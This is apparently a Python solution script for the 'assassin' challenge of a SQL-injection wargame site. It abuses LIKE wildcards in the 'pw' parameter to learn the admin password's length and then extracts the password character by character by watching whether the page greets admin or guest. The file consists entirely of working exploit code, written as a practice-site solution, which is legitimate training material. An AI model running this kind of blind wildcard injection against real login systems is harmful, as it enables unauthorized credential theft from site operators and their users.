import requests


password = ''
password_length = -1

URL = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'INSERT_YOUR_COOKIE_HERE'}

guest_length = -1
for estimated_length in range(1, 20):
    query = {'pw': '_' * estimated_length}

    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if "Hello admin" in res.text:
        password_length = estimated_length
        print("admin's password length is {}".format(password_length))
        break
    elif "Hello guest" in res.text:
        guest_length = estimated_length

if guest_length > 0 and password_length < 0:
    print("admin's password length is not found. using guest's password length: {}".format(guest_length))
    password_length = guest_length

for current_password_length in range(1, password_length+1) :
    guest_character = ''
    is_found = False
    for password_chr in range(ord('0'),ord('z')+1) :        
        query={'pw': password + chr(password_chr) + '_' * (password_length - current_password_length)}
        
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if "Hello admin" in res.text:
            password = password+chr(password_chr)
            is_found = True
            print(password)
            break
        
        elif "Hello guest" in res.text:
            guest_character = chr(password_chr)

    if is_found is False:
        password = password + guest_character
        print("admin's password character unknown. using guest's password character")
        print(password)
            

if len(password) == password_length:
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))